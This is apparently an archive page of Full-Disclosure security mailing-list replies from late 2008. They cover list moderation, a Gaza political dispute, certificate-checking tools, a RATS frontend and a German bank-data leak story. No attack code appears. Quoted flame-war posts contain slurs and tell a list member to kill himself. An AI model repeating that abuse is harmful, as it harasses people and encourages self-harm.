dscwI4rXN+xg/AL4x8zKvTpfq1WmKe9IZW102Wg6qSn1kBYALY7Je+BSQNrDS6nE 8ITUO+sEFyoATXYkJ+NfR1D8/uE9hScwspdDwZo0W5mqwaFjK4/tuTKl6UodnGlA t6oKgPcxvfsBlCg+Uljv8yIuvlFmTWxblTPxBynQOwLgCWwPyeA464MhTluZqx1h zfhXS88jYuI= =i0Z9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The (net)war in Palestine
This article shows the issue within Syria. People are so scared of the Gov... That they think it puts them through tests etc... On Mon, Jan 5, 2009 at 12:18 AM, Paul Schmehl pschmehl_li...@tx.rr.comwrote: --On January 4, 2009 10:27:19 AM -0600 Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: Arturo 'Buanzo' Busleiman wrote: Yeah, take all these crap out of a full-disclousure, IT security mailing list, please... To keep the discussion on topic, what do you think about the israel ability to professionaly arrange national-wide SMS spamming to border countries? http://fergdawg.blogspot.com/2008/12/israeli-telephone-commandos-strike. html Interesting. At the bottom of Paul's post there is a note. Note: There are no verifiable external resources listed to support this claim. -ferg IOW, this may or may not be true. Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ** WARNING: Check the headers before replying ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] to those who want moderation...
Full Disclosure is like free speech. We cannot have moderation if we want to have freedom on the list. Thats life. On Mon, Jan 5, 2009 at 9:45 PM, Warren Myers volcimas...@gmail.com wrote: eschew moderation! just delete crap you don't want :) WMM On Mon, Jan 5, 2009 at 2:26 PM, Michael Krymson krym...@gmail.com wrote: For those that want moderation on this mailing list, please let us all know how you would like to achieve said moderation on a mailing list populated by security-conscious persons who may also share a tendency to aschew rules and/or authority. Before vomiting out an answer, think a little bit more about it and continue down that road. Finally, when you come upon enlightenment, shut up and stop crying about moderation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Warren Myers http://warrenmyers.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Muslim Hackers Declare CyberWar on Israel
Interestingly enough they hacked into the DNS servers and just redirected the sites to another server as opposed to defacing them. On Tue, Jan 6, 2009 at 6:09 AM, Ureleet urel...@gmail.com wrote: drivel On Fri, Jan 2, 2009 at 5:46 PM, n3td3v xploita...@gmail.com wrote: http://garwarner.blogspot.com/2008/12/muslim-hackers-declare-cyberwar-on.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A tool to identify the MD5 certs on FF
This is a very nice tool. Thanks I am going to test it out now. On Tue, Jan 6, 2009 at 8:47 PM, Mark Sec mark@gmail.com wrote: MMM Efrain Torres a new module for identify CA with metasploit. -mark 2009/1/2 Aiko Barz a...@deepco.de On Thu, Jan 01, 2009 at 06:19:01PM -0500, Memisyazici, Aras wrote: SSL Blacklist now detects and warns about certificate chains that use the MD5 algorithm for RSA signatures. Does anybody know a plugin that keeps track of the used certificates and CAs? I tried certificate patrol [1]. But I wasn't too happy... I would like to get warnings, whenever a fingerprint changes. For example: INFO:The certificate fingerprint has changed. The new certificate is signed by the same CA. Details... WARNING: The certificate fingerprint has changed. The new certificate is signed by a different CA. A possible MITM attack has been detected. Details... So long, Aiko [1]: https://addons.mozilla.org/en-US/firefox/addon/6415 -- :wq ✉ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAklea0wACgkQemsPkv+IVCGFrQCfQxlBaThYbgxNFuvtbLR40oJI 6jYAn1UH9GLYMrRfKEZmFdEF1ATgDTVv =7Czh -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FD / lists.grok.org - bad SSL cert
SSL certs cost money. This one works the same. etc.. On Mon, Jan 5, 2009 at 2:35 PM, Gary Wilson dra...@dragons.org.uk wrote: Having had enough of the non-topic junk this list has become recently, I went to unsub, but it seems the SSL cert is not valid/trusted. For the mods, I guess: Secure Connection Failed lists.grok.org.uk uses an invalid security certificate. The certificate is not trusted because the issuer certificate is not trusted. (Error code: sec_error_untrusted_issuer) * This could be a problem with the server's configuration, or it could be someone trying to impersonate the server. * If you have connected to this server successfully in the past, the error may be temporary, and you can try again later. -- GW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The war in Palestine
Yes however we hope that the killing stops on both sides. On Sat, Jan 3, 2009 at 4:18 AM, Paul Schmehl pschmehl_li...@tx.rr.comwrote: --On January 2, 2009 4:27:10 PM -0600 Handrix hand...@gmail.com wrote: Hi all, The terrorist Israeli forces bombed Gaza city and destroyed many buildings and killed several hundred people. Israel likes to invoke as a justification for its attacks on its neighbors the war against Terror - the current slogan adopted by the United States. I hope that can help many people to understand why killing children, women, and all innocents person. Please STOP WAR IN PALASTINE Hamas has sent over 6000 rockets into Israel over the past three years. In 2008 alone they launched 1,750 rockets and 1,528 mortar shells into Israeli territory. They're about as innocent as a thief caught with his hand in the cookie jar. Not only that but they deliberately place their rocket and mortar launchers in the middle of civilian targets in an effort to produce as many Palestinian casualties as possible purely for propaganda purposes. They alone are responsible for the deaths of innocent Palestinians. The Palestinians overwhelmingly voted Hamas into power and fully support their repeated murder of Israelis. They support the complete annihilation of Israel and all its people. What do you expect Israel to do? Negotiate with bloodthirsty murderers? Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ** WARNING: Check the headers before replying ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess
I wish! Fortify software has been tested against many open source projects and reported a bunch of false positives. Yes i know they are working to improve the software However i still hold that fuzzing will show you some issues that this software cannot. James On Tue, Dec 30, 2008 at 8:16 PM, Simon Smith si...@snosoft.com wrote: http://snosoft.blogspot.com/2008/12/brian-chess-cto-of-fortify-software.html Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Merry Christmas
Merry Christmas and happy new year On Sun, Dec 28, 2008 at 11:52 PM, Jared DeMott jdem...@crucialsecurity.comwrote: KammyDoe wrote: Merry Christmas, FD! It's been a fun year; here's to '09! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ And may God bless you! :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This list has run its course
My spam folder is very happy! I wonder what the list will become now... On Tue, Dec 23, 2008 at 11:34 AM, James Rankin kz2...@googlemail.comwrote: Well just f*ck off then and cease babbling about it. Please, make my Spam folder happy. 2008/12/23 n3td3v xploita...@gmail.com This mailing list is no longer credible for serious researchers to be on. I'll be elsewhere, just not HERE. On Tue, Dec 23, 2008 at 6:07 AM, Biz Marqee biz.mar...@gmail.com wrote: you're obviously a lying cunt or you would have ceased posting to this list already. On Tue, Dec 23, 2008 at 4:15 PM, n3td3v xploita...@gmail.com wrote: n3td3v continues on the internet elsewhere just not HERE. On Tue, Dec 23, 2008 at 4:37 AM, Biz Marqee biz.mar...@gmail.com wrote: Good job faggot, its only been 3 years coming. I believe it was Immortal Technique who said it best, Just kill yourself! On Tue, Dec 23, 2008 at 9:53 AM, n3td3v xploita...@gmail.com wrote: Real researchers who should be taken seriously aren't taken seriously anymore. I'm leaving full-disclosure because of the abuse. It's just turned into flames to spin people up, I don't get a chance to talk about security or my skill set. It's abuse after abuse after abuse. Sorry, I can't take it anymore. Got to go, bye. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] STAR - A frontend to RATS
Looks good i am going to check it out soon against some php code. I love writing in python and will try to contribute to the code On Tue, Dec 23, 2008 at 5:35 PM, Ben comsat...@earthlink.net wrote: All, While bored at work this past week I decided to throw together a front end for the Rough Auditing Tool for Security (RATS). It supports most features of RATS and runs on both win32 and nix systems. Development was in Python (PyQt4) and the app has been packaged using py2exe. See http://www.socialnetworkwhore.com/ for screen shots and downloads. Any cool feature ideas would be appreciated :) Have a great day, Ben P.S. Source code coming soon :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Urgent Google Contact
There is also http://www.justfuckinggoogleit.com/ On Fri, Dec 19, 2008 at 12:16 AM, Aaron Turner synfina...@gmail.com wrote: On Thu, Dec 18, 2008 at 1:46 PM, xyberpix xyber...@xyberpix.com wrote: Hi all, Does anyone have contact details for anyone at Google's security department at all? Here you go: http://www.letmegooglethatforyou.com/?q=google+security+contact -- Aaron Turner http://synfin.net/ http://tcpreplay.synfin.net/ - Pcap editing and replay tools for Unix Windows They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. -- Benjamin Franklin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] List of security teams contact information
Well it's a Wiki so we can all contribute. On Wed, Dec 17, 2008 at 5:27 PM, security curmudgeon jeri...@attrition.orgwrote: : I've created a list with contact information for various security teams: : : http://skypher.com/wiki/index.php?title=List_of_security_teams_contact_information : I hope this makes informing vendors about security issues easier. If you : have any additional information or spot an error, let me know. http://osvdb.org/vendors This project was created a while back to do the same. Please consider contributing to it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] request for comments...
Wow now there is a twitter also! On Wed, Dec 17, 2008 at 2:31 PM, j-f sentier j.sent...@gmail.com wrote: N3td3v, the FD voice. 2008/12/17 n3td3v xploita...@gmail.com On Tue, Dec 16, 2008 at 6:53 PM, Ureleet urel...@gmail.com wrote: On Tue, Dec 16, 2008 at 11:59 AM, n3td3v xploita...@gmail.com wrote: On Tue, Dec 16, 2008 at 4:16 PM, jose achada achada.j...@gmail.com wrote: no phisical barriers are imposed and nor the big media can hide you. The intelligence services have been in control of the big media and have been for some time. ill agree there. When I started full-disclosure I was innocent and pure, then I met various people and realised how the world really works. u didnt start fulldisclosure, u mean 2 say, when u started ON fd. but according 2 ur posts be4 fd existed that i have googled, thats a lie. I met them on-line and in person, they wanted a slice of n3td3v, they wanted to control the path n3td3v takes... I told them I won't allow you to do that, but you can be with me and we can progress together... I still get emails from the intelligence services trying to give me advice on the path of n3td3v, but I reject all advice. obviusly I know that the government can impose big guys to come after me to force me to 'go with their agenda, not mine' but im not at that stage yet. The n3td3v group is still free from government influence, apart from the 'big media' who control us all. I fear this won't last forever, there are people trying to control what n3td3v is doing behind the scenes, because its become a big powerful name in the 'cyber security' arena. u have dilusious of grandeur. u rnt a big powerful name. u rnt a group. u r just u. nd no 1 knows u. I will as long as I can make n3td3v be free and independent from the intelligence services, but if they offer me a job how will I stop myself being influenced by their agenda? this is why. n3td3v = andrew wallace. Thanks for your feedback on what you think, not that I or anyone or this list care what you think. -Andrew http://twitter.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] new unpatched security flaw found Firefox 3.0.4
Maybe one day it will be exploited as a bug. On Wed, Dec 17, 2008 at 12:28 PM, Andrew Farmer andf...@gmail.com wrote: On 16 Dec 08, at 11:49, carl hardwick wrote: New unpatched security flaw found in Firefox 3.0.4 PoC here: https://bugzilla.mozilla.org/attachment.cgi?id=302699 Relevant bug is https://bugzilla.mozilla.org/show_bug.cgi?id=416907 This doesn't appear to be security-critical - it's a NULL dereference. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Two windows exploits in the wild
One IE exploit and One Wordpad http://it.slashdot.org/it/08/12/10/206216.shtml On a more interesting note i feel that slashdot should screen there writers better Here is a quote that i saw *The exploit is a typical heap overflow that appears to be exploiting something in the XML parser.' *Try to have someone that knows what a heap overflow look over the article next time. If it's a heap overflow we know it's exploiting a heap within the program. -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FD subject line/name of org suggestion...
This is quite simple to do on Gmail. All you need to do is open any full-disclosure email. Then click on show details and select filter messages from this mailing list. On Thu, Dec 11, 2008 at 6:10 PM, [EMAIL PROTECTED] wrote: On Thu, 11 Dec 2008 10:39:51 EST, Phillip Partipilo said: Could try a separate folder and using rules to segregate FD emails. There really arent *that* many emails, I mean, compared to nearly insane volume of ntsysadmin or activedir. Are they worse than linux-kernel, which is averaging some 500+ messages a day? Note that nobody reads every post in linux-kernel. In fact, nobody who expects to have time left over to actually do any real kernel work will read even half. Except Alan Cox, but he's actually not human, but about a thousand gnomes working in under-ground caves in Swansea. None of the individual gnomes read all the postings either, they just work together really well. -- Linus Torvalds (2000-05-02) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Jobless techies turning to crime
These people have skills that can be used for good or bad. Everyone has to eat and i feel that these people should look into starting a new company or creating a website and blogging about there former workplace. On Fri, Dec 12, 2008 at 2:00 AM, Ivan . ivan...@gmail.com wrote: Both PricewaterhouseCoopers (PwC) and security vendor Finjan are forecasting that the recession will fuel a significant rise in insider fraud and cyber crime in 2009. http://www.silicon.com/financialservices/0,3800010322,39363838,00.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astoandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 21 Million German bank accounts stolen
Also money transfers are traceable I am guessing that they also have EC card data. On Wed, Dec 10, 2008 at 2:06 PM, Jost Krieger [EMAIL PROTECTED][EMAIL PROTECTED] wrote: On Tue, Dec 09, 2008 at 04:11:48PM +0200, James Matthews wrote: German banks are some of the oldest in the world. This is pretty scary however it is also the reality of germanys new laws... I hope they find it soon and protect the people that need to be protected http://it.slashdot.org/it/08/12/09/0125201.shtml What Slashdot doesn't say: What was disclosed were 1.2 million account numbers plus additional information, but not means of access. This is bad enough of course. The 21 million were claimed to be available by the perps, which is believable, as they tried to sell them to a newspaper. The trail seems to lead to small call centers, where someone collects these data and sells them on the side. The banks seem not to be involved at all. If you find this all weird, payments in Germany work totally different from the US. Noone uses checks for private payments, either you use money transfer or you have the money directly pulled from your account (and you can call it back for at least 6 weeks). So a lot of people know your account number. Jost -- | Helft Spam ausrotten!HTML in Mail ist unhöflich. | | Postmaster, JAPH, manchmal Wahrsager am RZ der RUB | | Wahre Worte sind nicht gefällig, gefällige Worte sind nicht wahr.| | Lao Tse, Tao Te King 81 | ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 21 Million German bank accounts stolen
German banks are some of the oldest in the world. This is pretty scary however it is also the reality of germanys new laws... I hope they find it soon and protect the people that need to be protected http://it.slashdot.org/it/08/12/09/0125201.shtml -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says
And money is used to bail out banks and other massive company's! On Tue, Dec 9, 2008 at 4:01 PM, Ureleet [EMAIL PROTECTED] wrote: time is money. On Mon, Dec 8, 2008 at 11:28 PM, Rafal @ IsHackingYou.com [EMAIL PROTECTED] wrote: Ivan, all, Hold the phone...$5k-$7k to fix an infected device!? Really? HOLY CRAP... either that's a completely made-up FUD figure, or the government contractors are making *way* too much money off my taxes. __ Rafal M. Los IT Security - Response | Mitigation | Strategy E-mail: [EMAIL PROTECTED] - Blog: http://preachsecurity.blogspot.com -- From: Ivan . [EMAIL PROTECTED] Sent: Monday, December 08, 2008 5:14 PM To: Full-Disclosure mailing list full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 21 Million German bank accounts stolen
Contact your bank and ask them how they protect you against fraud. Get everything in writing. Then to be safe change everything (hoping that these people don't have continual access to the banks server so they pick up new accounts) Place a credit watch on your SCHUFA score and hope that the BND catches them. On Tue, Dec 9, 2008 at 11:57 PM, Some Guy Posting To Full Disclosure [EMAIL PROTECTED] wrote: To you or someone who knows anything about banks, fraud, and how they work and things. I have a German bank account. Should I do something!? On 12/9/08, James Matthews [EMAIL PROTECTED] wrote: German banks are some of the oldest in the world. This is pretty scary however it is also the reality of germanys new laws... I hope they find it soon and protect the people that need to be protected http://it.slashdot.org/it/08/12/09/0125201.shtml -- http://www.astorandblack.com/ -- I'm your best best friend. -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: We're letting the bad guys win
One thing i love about all these flame wars are the choice of words. The flames are great but i think they have flame lists for that. So please try to keep it to a minimum On Mon, Dec 8, 2008 at 3:34 PM, Ureleet [EMAIL PROTECTED] wrote: plez stop picking on me guyz! btw -- i didnt create the bandwagon. i can find ppl flaming you since like 96, when u were prepubescent and jacking off to ascii printout porn. (comeon u fuckers u know u did it 2) youve said some outlandish bullshit comments over the years, and now we are calling u out 4 them. i suggest u rethink ur strategy. On Sun, Dec 7, 2008 at 10:08 PM, j-f sentier [EMAIL PROTECTED] wrote: LMAO 2008/12/7 n3td3v [EMAIL PROTECTED] I think we're all as bad as each other, c'mon guys we shouldn't be fighting like this in the infosec community, the hackers will be laughing at us fighting with each other when we should be thinking up new ways to beat the bad guys. One day maybe we can all meet up for a beer and be good buddies, there is no need for this type of fighting in infosec, live and let live. Some kind of bandwagon has been created by Ureleet that some infosec members have jumped on, I urge you to jump off this bandwagon, we all need to unify as a community and come up with solutions to tackle big things coming up in information security, like stopping the bad guys use security software that is only intended for penetration testers in the security professional community. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NY Time on Bots
Nice to know that we are losing the war. This was written after some botnets almost died. http://www.nytimes.com/2008/12/06/technology/internet/06security.html?_r=2 -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris 10 Auditing
I found that Solaris is too much like old Unix and i got spoilt by Linux already. Good luck. On Mon, Dec 8, 2008 at 7:24 PM, Michael Holstein [EMAIL PROTECTED] wrote: I am looking for a free audit script / tool to audit host level security for Solaris 10 machines. Does any one know of any such scripts / tools around? http://www.cisecurity.org/benchmarks.html Cheers, Michael Holstein CISSP GCIA Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says
They are trying to get the government to do something about it. But unless they see the danger not just hear about it nothing will happen. Consider remarks before Congress last year by O. Sami Saydjari, CEO of Cyber Defense Agency http://www.cyberdefenseagency.com/, a security research and consulting firm, and a former official at the Defense Dept.'s research arm, DARPA. Following a major cyber-attack, he told legislators, electricity, banking, and communications could all go dead, leaving Americans scrounging for food, water, gasoline—even hunks of firewood traded on the black market. On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 They ain't called beltway bandits for nothing... On Mon, 08 Dec 2008 23:28:52 -0500 Rafal @ IsHackingYou.com [EMAIL PROTECTED] wrote: Ivan, all, Hold the phone...$5k-$7k to fix an infected device!? Really? HOLY CRAP... either that's a completely made-up FUD figure, or the government contractors are making *way* too much money off my taxes. __ Rafal M. Los IT Security - Response | Mitigation | Strategy E-mail: [EMAIL PROTECTED] - Blog: http://preachsecurity.blogspot.com -- From: Ivan . [EMAIL PROTECTED] Sent: Monday, December 08, 2008 5:14 PM To: Full-Disclosure mailing list full- [EMAIL PROTECTED] Subject: [Full-disclosure] U.S. Is Losing Global Cyberwar, Commission Says http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db20081 27_817606.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkk99owACgkQi04xwClgpZjY7AP/U3/nVeboctT47VJv9/ZmVY3EG6uE 0oJhSZBqOtwJwu8RpXLGHpMj7iVkWEOAdI+iaEdZsWC+yGnvAkUUI4xnHkA3gKfzSB9j gvG8XT/bcrbsON3dF9NOrb2hzdq8DqPbgDAIEg5wR3k3gXjrMap3BoIchz5g06HA18ih INTTfno= =3ZDD -END PGP SIGNATURE- -- Save hundreds on an Unsecured Loan - Click here. http://tagline.hushmail.com/fc/PnY6qxtViPpZpPq5YJjtAbu0xAEgHnQ9Is2jctQdjJChMVzyH6VQE/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FD culture!?
There are many moderated security lists. Spam annoys us all but here it's allowed. On Sat, Dec 6, 2008 at 7:15 PM, The Security Community [EMAIL PROTECTED] wrote: On Sat, Dec 6, 2008 at 1:00 AM, Bipin Gautam [EMAIL PROTECTED] wrote: Guys, This mailing list lives up to its name Full Disclosure for tolerating the monkeys and their chattering in this list for quite some time now without moderation or any action! This mailing list had a culture, the audience base and that was the only reason we all subscribed to it! God only knows there's damned little disclosure going on, full or otherwise. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.astorandblack.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] News for Ureleet
